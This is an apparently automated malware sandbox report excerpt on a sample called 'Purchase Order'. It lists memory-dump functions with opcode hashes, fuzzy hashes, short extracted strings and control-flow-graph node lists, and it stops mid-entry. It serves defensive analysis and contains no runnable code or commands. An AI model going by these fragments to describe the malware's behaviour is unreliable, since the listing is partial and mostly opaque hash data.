                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fea63b08acfb8250feffa91ee71bb1191075d3909880e26f4478c4bb4089e698
                                                                                                            • Instruction ID: a661264a1391b61c010efd04487ecf05a54005e124844955abe240dade13d07b
                                                                                                            • Opcode Fuzzy Hash: fea63b08acfb8250feffa91ee71bb1191075d3909880e26f4478c4bb4089e698
                                                                                                            • Instruction Fuzzy Hash: 08D1F431D2065A8BCB00EB68D994A9DB771FFD5300F508B9AE44937221EF706AD5CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0190D5BC Relevance: .3, Instructions: 264COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1732264506.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1900000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e337ad8acdca596b845661bf8506d5dc1f197d258c4526893609271a3eb54994
                                                                                                            • Instruction ID: c8a8639f734de857febe4997a6b4c928e73df7081c5bef553b35369f030797a1
                                                                                                            • Opcode Fuzzy Hash: e337ad8acdca596b845661bf8506d5dc1f197d258c4526893609271a3eb54994
                                                                                                            • Instruction Fuzzy Hash: 84A19232E00209CFCF16DFB4C84459EBBB6FF85301B15456AE909AB2A5DB71EA55CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B6240 Relevance: .3, Instructions: 264COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8dcbbd07f95132eb9124887b1df6cda3d36fb798bdf6f0c8ee00f700035a0f1a
                                                                                                            • Instruction ID: 155d10b6c6cf09d97573e66ac622ea366b2024ba374f9b7c3a0a4ac8ff930651
                                                                                                            • Opcode Fuzzy Hash: 8dcbbd07f95132eb9124887b1df6cda3d36fb798bdf6f0c8ee00f700035a0f1a
                                                                                                            • Instruction Fuzzy Hash: 71D1F431D2065A8BCB00EB68D994A9DB771FFD5300F60CB9AE44937221EF706AD5CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BEA40 Relevance: .1, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e091a894c03853979eae6d03439a7c2d27c5617f8e12070f611d607e4e81069
                                                                                                            • Instruction ID: e43ddc9dd09c8961b5c240e4e02dd3730358399df940f152640d9af67e214018
                                                                                                            • Opcode Fuzzy Hash: 0e091a894c03853979eae6d03439a7c2d27c5617f8e12070f611d607e4e81069
                                                                                                            • Instruction Fuzzy Hash: 05510571E042198BDB14CFA9C5805EEFBF2EF89304F24816AD819AB315D735A942CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BE1D2 Relevance: .1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c4ad94a60dc428f575c94c90a52f1c6188492c4563ab03e803ea9d525288e23e
                                                                                                            • Instruction ID: abb856745197f76c3d432b96f4475a878e0f7e2979b004070bfa6954fd57431e
                                                                                                            • Opcode Fuzzy Hash: c4ad94a60dc428f575c94c90a52f1c6188492c4563ab03e803ea9d525288e23e
                                                                                                            • Instruction Fuzzy Hash: 8351E675E002198BDB14CFA9C5845EEFBF2FF89304F24816AD818AB315D7319942CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B3AC8 Relevance: .1, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8570685ca1cfbb7e4548663c7075fce02966b5d851106f9f5ad859e905975f4
                                                                                                            • Instruction ID: 566ad6c5fc456b62d2e523116d1c0515ed748cf97bbc484871ebd0d047f15c93
                                                                                                            • Opcode Fuzzy Hash: e8570685ca1cfbb7e4548663c7075fce02966b5d851106f9f5ad859e905975f4
                                                                                                            • Instruction Fuzzy Hash: D53196B5E016188BEB18CF6BD9417C9FAF3AFC8300F14C1AAD508AB265EB3159858F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05865A97 Relevance: 11.4, Strings: 9, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-2799590105
                                                                                                            • Opcode ID: 27ca8be2062b430ba4e4d424d4c1136926fe6c6839f4eabec8d618252df9a6f9
                                                                                                            • Instruction ID: 34cb2099016ffdc8d4d5642460e5b77d63fdfcead6cb915f8110df7f92260fc0
                                                                                                            • Opcode Fuzzy Hash: 27ca8be2062b430ba4e4d424d4c1136926fe6c6839f4eabec8d618252df9a6f9
                                                                                                            • Instruction Fuzzy Hash: 17412F70E0120B8FCB48EFB8E8945AE7BB2FF55310F104569C805AB2A4DF392D558B92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05865AA8 Relevance: 11.4, Strings: 9, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-2799590105
                                                                                                            • Opcode ID: 5158640980ff8cf7261b5797db133ed44e63999660c1143486411585c0058992
                                                                                                            • Instruction ID: d03f0c63d7f6574f3a50cbaad4c3d93a8183421108c8ea540e902347ba888329
                                                                                                            • Opcode Fuzzy Hash: 5158640980ff8cf7261b5797db133ed44e63999660c1143486411585c0058992
                                                                                                            • Instruction Fuzzy Hash: CA410070E0120B9FCB49FFB8E89449E7BB2FF55300F505569D805AB2A4DF352D548B92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BA4A8 Relevance: 10.3, Strings: 8, Instructions: 254COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: zS$.>S$.>S$.>S$.>S$.>S$.>S$.>S
                                                                                                            • API String ID: 0-3926277064
                                                                                                            • Opcode ID: a41239bab4dcf3a598d414b56070999b58efa30b51bc79a48a41179020104eb4
                                                                                                            • Instruction ID: b7f4a0e4ed017cfddd0f2029244a93e9937d7072b0576ce0a6554ebd4718055f
                                                                                                            • Opcode Fuzzy Hash: a41239bab4dcf3a598d414b56070999b58efa30b51bc79a48a41179020104eb4
                                                                                                            • Instruction Fuzzy Hash: 01A10874E052198FDB04DFA8C580ADDBBFAFF89300F50961AD419BB255DB30A946CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BA498 Relevance: 10.2, Strings: 8, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: zS$.>S$.>S$.>S$.>S$.>S$.>S$.>S
                                                                                                            • API String ID: 0-3926277064
                                                                                                            • Opcode ID: 8d90487a2614fab8f4a2f25b0fdde61c2caea9d949011212e8be4cda6cdabc53
                                                                                                            • Instruction ID: 5cc8210b9d6a10fcd70128b1ecf95190f8097243e67b944f78fcd299ff817b93
                                                                                                            • Opcode Fuzzy Hash: 8d90487a2614fab8f4a2f25b0fdde61c2caea9d949011212e8be4cda6cdabc53
                                                                                                            • Instruction Fuzzy Hash: 45911974E0520A8FDB04DFA8D580ADDBBFAFF89300F50961AD419AB355DB30A946CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05866D00 Relevance: 9.1, Strings: 7, Instructions: 358COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-4057749079
                                                                                                            • Opcode ID: c3014cfb286df3d4697b467213487f2ecaa4b7fe98a0115673312a105db75846
                                                                                                            • Instruction ID: d62a9426a808258568dacc566c6aac542f78ca731a95f1dc5e9c50452c21b4bb
                                                                                                            • Opcode Fuzzy Hash: c3014cfb286df3d4697b467213487f2ecaa4b7fe98a0115673312a105db75846
                                                                                                            • Instruction Fuzzy Hash: 54E14E70B01205CFDB08EB69E5947AD7BB2FF88304F108468D906EB3A5DF79AD518B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05866E10 Relevance: 9.0, Strings: 7, Instructions: 284COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-4057749079
                                                                                                            • Opcode ID: e8e981d12494d5c924537bed3110c5c76ee0980937f75d8a832acc72021114a5
                                                                                                            • Instruction ID: f323ab1569aa4e63ff21a679798473a57e4f03793d2a72f5533d050cb36553fc
                                                                                                            • Opcode Fuzzy Hash: e8e981d12494d5c924537bed3110c5c76ee0980937f75d8a832acc72021114a5
                                                                                                            • Instruction Fuzzy Hash: E1C12B70B01205CFDB04EB69E9947AD7BB2FB48308F104468D906EB3A5DF79AD51CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05867020 Relevance: 8.9, Strings: 7, Instructions: 162COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-4057749079
                                                                                                            • Opcode ID: 6359fa5c1a8ccc813708fe0dee5c8bf1e3ad1973cb5f6feff1f455f6e13a2684
                                                                                                            • Instruction ID: fe00b568bca4daaddbdbb7e40cbeebf4dd5f7f5ccd6b8e75850664f4f71cc9c5
                                                                                                            • Opcode Fuzzy Hash: 6359fa5c1a8ccc813708fe0dee5c8bf1e3ad1973cb5f6feff1f455f6e13a2684
                                                                                                            • Instruction Fuzzy Hash: BC611E70B01205CFDB04EF6DF994B997BB1FB48308B008469DA05AB362DF79ED609B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05867DC9 Relevance: 7.6, Strings: 6, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-1373546133
                                                                                                            • Opcode ID: 3973bbf542f88135fdfcdceaa17970cf0569dd73452e257d30d2fad06c0cf4e8
                                                                                                            • Instruction ID: ee9b0bcc6fac566c0140452303b4eb068b5a524d68b173b087601e74c2fa8a6e
                                                                                                            • Opcode Fuzzy Hash: 3973bbf542f88135fdfcdceaa17970cf0569dd73452e257d30d2fad06c0cf4e8
                                                                                                            • Instruction Fuzzy Hash: 9441DFB0A03206CFD748EF68E85466E7FB7FF46204B904569C805AF2A8DB386D14CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05867DD8 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                            • API String ID: 0-1373546133
                                                                                                            • Opcode ID: 6879b09b6040fd42edeede9e2e3d3c84d1aaee85ff8a6cd476341a51d780884b
                                                                                                            • Instruction ID: 2698235fcb2cfb733812bdf93d710b2feea92d855096e41520552b0bf43aa8b1
                                                                                                            • Opcode Fuzzy Hash: 6879b09b6040fd42edeede9e2e3d3c84d1aaee85ff8a6cd476341a51d780884b
                                                                                                            • Instruction Fuzzy Hash: FE41ABB0A02206CFD748FF68E85466E7BF7FB462007904569C805AF2A8EF386D55CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:36.8%
                                                                                                            Total number of Nodes:19
                                                                                                            Total number of Limit Nodes:0
                                                                                                            execution_graph 26008 166d3d0 26009 166d3dc 26008->26009 26013 6e98608 26009->26013 26018 6e98602 26009->26018 26010 166d5b6 26014 6e9862a 26013->26014 26015 6e9873c 26014->26015 26023 5db7ba8 26014->26023 26027 5db7f8c 26014->26027 26015->26010 26019 6e9862a 26018->26019 26020 6e9873c 26019->26020 26021 5db7ba8 LdrInitializeThunk 26019->26021 26022 5db7f8c LdrInitializeThunk 26019->26022 26020->26010 26021->26020 26022->26020 26026 5db7bd9 26023->26026 26024 5db7d39 26024->26015 26025 5db80c9 LdrInitializeThunk 26025->26024 26026->26024 26026->26025 26030 5db7e43 26027->26030 26028 5db80c9 LdrInitializeThunk 26029 5db80e1 26028->26029 26029->26015 26030->26028

                                                                                                            Executed Functions

                                                                                                            Function 0166B388 Relevance: 6.6, Strings: 5, Instructions: 351COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 147 166b388-166b39b 148 166b3a1-166b3aa 147->148 149 166b4da-166b4e1 147->149 150 166b4e4 148->150 151 166b3b0-166b3b4 148->151 155 166b4e9-166b4f1 150->155 152 166b3b6 151->152 153 166b3ce-166b3d5 151->153 154 166b3b9-166b3c4 152->154 153->149 156 166b3db-166b3e8 153->156 154->150 157 166b3ca-166b3cc 154->157 160 166b4f3-166b510 155->160 161 166b561-166b580 155->161 156->149 162 166b3ee-166b401 156->162 157->153 157->154 165 166b512-166b52a 160->165 166 166b53c 160->166 163 166b587-166b664 call 1663960 call 1663480 161->163 164 166b582 161->164 167 166b406-166b40e 162->167 168 166b403 162->168 210 166b666 163->210 211 166b66b-166b68c call 1664e20 163->211 164->163 182 166b533-166b536 165->182 183 166b52c-166b531 165->183 171 166b53e-166b542 166->171 169 166b410-166b416 167->169 170 166b47b-166b47d 167->170 168->167 169->170 173 166b418-166b41e 169->173 170->149 172 166b47f-166b485 170->172 172->149 176 166b487-166b491 172->176 173->155 177 166b424-166b43c 173->177 176->155 180 166b493-166b4ab 176->180 193 166b43e-166b444 177->193 194 166b469-166b46c 177->194 196 166b4d0-166b4d3 180->196 197 166b4ad-166b4b3 180->197 186 166b543-166b55f 182->186 187 166b538-166b53a 182->187 183->171 186->161 187->165 187->166 193->155 198 166b44a-166b45e 193->198 194->150 199 166b46e-166b471 194->199 196->150 202 166b4d5-166b4d8 196->202 197->155 201 166b4b5-166b4c9 197->201 198->155 207 166b464 198->207 199->150 203 166b473-166b479 199->203 201->155 208 166b4cb 201->208 202->149 202->176 203->169 203->170 207->194 208->196 210->211 213 166b691-166b69c 211->213 214 166b6a3-166b6a7 213->214 215 166b69e 213->215 216 166b6ac-166b6b3 214->216 217 166b6a9-166b6aa 214->217 215->214 219 166b6b5 216->219 220 166b6ba-166b6c8 216->220 218 166b6cb-166b70f 217->218 224 166b775-166b78c 218->224 219->220 220->218 226 166b711-166b727 224->226 227 166b78e-166b7b3 224->227 231 166b751 226->231 232 166b729-166b735 226->232 233 166b7b5-166b7ca 227->233 234 166b7cb 227->234 237 166b757-166b774 231->237 235 166b737-166b73d 232->235 236 166b73f-166b745 232->236 233->234 240 166b7cc 234->240 238 166b74f 235->238 236->238 237->224 238->237 240->240
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: faa87f87aaf88f6d059970a7b7ff4cf28a35fd9ca52b14c0dce71dba848fced4
                                                                                                            • Instruction ID: 7fc20b0829a3669a03ca5858c37ba9ad0135c5fb1de8ba3398b69ae0bb95431a
                                                                                                            • Opcode Fuzzy Hash: faa87f87aaf88f6d059970a7b7ff4cf28a35fd9ca52b14c0dce71dba848fced4
                                                                                                            • Instruction Fuzzy Hash: D2E1C575A01218CFDB14CFA9D984A9DBBB6BF48310F158069E919EB365DB30AD82CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166C1F0 Relevance: 6.5, Strings: 5, Instructions: 209COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 243 166c1f0-166c1f5 244 166c1f7-166c1fc 243->244 245 166c265-166c266 243->245 246 166c253-166c262 244->246 247 166c1fe-166c220 244->247 248 166c267-166c304 call 1663960 call 1663480 245->248 249 166c250-166c251 245->249 246->245 250 166c227-166c24f 247->250 251 166c222 247->251 262 166c306 248->262 263 166c30b-166c32c call 1664e20 248->263 249->246 250->249 251->250 262->263 265 166c331-166c33c 263->265 266 166c343-166c347 265->266 267 166c33e 265->267 268 166c34c-166c353 266->268 269 166c349-166c34a 266->269 267->266 271 166c355 268->271 272 166c35a-166c368 268->272 270 166c36b-166c3af 269->270 276 166c415-166c42c 270->276 271->272 272->270 278 166c3b1-166c3c7 276->278 279 166c42e-166c453 276->279 283 166c3f1 278->283 284 166c3c9-166c3d5 278->284 285 166c455-166c46a 279->285 286 166c46b 279->286 289 166c3f7-166c414 283->289 287 166c3d7-166c3dd 284->287 288 166c3df-166c3e5 284->288 285->286 290 166c3ef 287->290 288->290 289->276 290->289
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: 4a6e3a234b672bcc3cbae83f1d2ac70bfa508ee84768a24aeb91895e573f2ab6
                                                                                                            • Instruction ID: 78582bf795f8f5bc0efa59cc7713dfc0ef76d69813a887b982058bd731a00f0c
                                                                                                            • Opcode Fuzzy Hash: 4a6e3a234b672bcc3cbae83f1d2ac70bfa508ee84768a24aeb91895e573f2ab6
                                                                                                            • Instruction Fuzzy Hash: 2991D674E01608CFDB14DFAAD984A9DBBF6FF89300F14806AE859AB355DB309981CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166BF10 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 294 166bf10-166bf11 295 166bf13-166bf19 294->295 296 166bf81-166bf82 294->296 297 166bf1b-166bf40 295->297 298 166bf89 295->298 296->298 299 166bf47-166bf6a 297->299 300 166bf42 297->300 301 166bf6b-166bf80 298->301 302 166bf8b-166bf93 298->302 299->301 300->299 301->296 304 166bf95-166bfb4 call 1663960 call 1663480 302->304 305 166bff0-166c024 302->305 311 166bfb9-166bfee 304->311 312 166c026 305->312 313 166c02b-166c04c call 1664e20 305->313 311->305 312->313 316 166c051-166c05c 313->316 317 166c063-166c067 316->317 318 166c05e 316->318 319 166c06c-166c073 317->319 320 166c069-166c06a 317->320 318->317 322 166c075 319->322 323 166c07a-166c088 319->323 321 166c08b-166c0cf 320->321 327 166c135-166c14c 321->327 322->323 323->321 329 166c0d1-166c0e7 327->329 330 166c14e-166c173 327->330 334 166c111 329->334 335 166c0e9-166c0f5 329->335 337 166c175-166c18a 330->337 338 166c18b 330->338 336 166c117-166c134 334->336 339 166c0f7-166c0fd 335->339 340 166c0ff-166c105 335->340 336->327 337->338 341 166c10f 339->341 340->341 341->336
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: 03688797af7204389ab9ec6dccbdfa9f69403cf9619ef06d828ef9d78b6e5c2e
                                                                                                            • Instruction ID: 7ec7b5c2dbb01e849ff1bcb1c59d983c59158ee843bd2e79bedde26ddc995ddc
                                                                                                            • Opcode Fuzzy Hash: 03688797af7204389ab9ec6dccbdfa9f69403cf9619ef06d828ef9d78b6e5c2e
                                                                                                            • Instruction Fuzzy Hash: DE91E574E00608CFDB14DFAAD884A9DBBF6FF89300F148069E859AB365DB319981CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166C7B2 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 345 166c7b2-166c7b8 346 166c73d-166c74c 345->346 347 166c7ba-166c7e0 345->347 346->345 348 166c7e7-166c82f 347->348 349 166c7e2 347->349 353 166c837-166c846 call 1663960 348->353 349->348 357 166c84b-166c8c4 call 1663480 353->357 363 166c8c6 357->363 364 166c8cb-166c8ec call 1664e20 357->364 363->364 366 166c8f1-166c8fc 364->366 367 166c903-166c907 366->367 368 166c8fe 366->368 369 166c90c-166c913 367->369 370 166c909-166c90a 367->370 368->367 372 166c915 369->372 373 166c91a-166c928 369->373 371 166c92b-166c96f 370->371 377 166c9d5-166c9ec 371->377 372->373 373->371 379 166c971-166c987 377->379 380 166c9ee-166ca13 377->380 384 166c9b1 379->384 385 166c989-166c995 379->385 387 166ca15-166ca2a 380->387 388 166ca2b 380->388 386 166c9b7-166c9d4 384->386 389 166c997-166c99d 385->389 390 166c99f-166c9a5 385->390 386->377 387->388 391 166c9af 389->391 390->391 391->386
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: e375ede35186b330d923049a67cceae689e532c2ec3eae5e40475a12e4debc20
                                                                                                            • Instruction ID: 93a77e144b3411efd1260839227a7723f77fdbe5f6143c8a8af7e5bc0a4d15df
                                                                                                            • Opcode Fuzzy Hash: e375ede35186b330d923049a67cceae689e532c2ec3eae5e40475a12e4debc20
                                                                                                            • Instruction Fuzzy Hash: 4A81C674E01618CFDB14DFAAD994A9DBBF2BF88300F14D169E849AB365DB309981CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166CA92 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 395 166ca92-166ca9c 396 166caf3-166cba4 call 1663960 call 1663480 395->396 397 166ca9e-166cac0 395->397 409 166cba6 396->409 410 166cbab-166cbcc call 1664e20 396->410 398 166cac7-166caf1 397->398 399 166cac2 397->399 398->396 399->398 409->410 412 166cbd1-166cbdc 410->412 413 166cbe3-166cbe7 412->413 414 166cbde 412->414 415 166cbec-166cbf3 413->415 416 166cbe9-166cbea 413->416 414->413 418 166cbf5 415->418 419 166cbfa-166cc08 415->419 417 166cc0b-166cc4f 416->417 423 166ccb5-166cccc 417->423 418->419 419->417 425 166cc51-166cc67 423->425 426 166ccce-166ccf3 423->426 430 166cc91 425->430 431 166cc69-166cc75 425->431 432 166ccf5-166cd0a 426->432 433 166cd0b 426->433 436 166cc97-166ccb4 430->436 434 166cc77-166cc7d 431->434 435 166cc7f-166cc85 431->435 432->433 437 166cc8f 434->437 435->437 436->423 437->436
                                                                                                            Strings
                                                                                                            Memory Dump Source
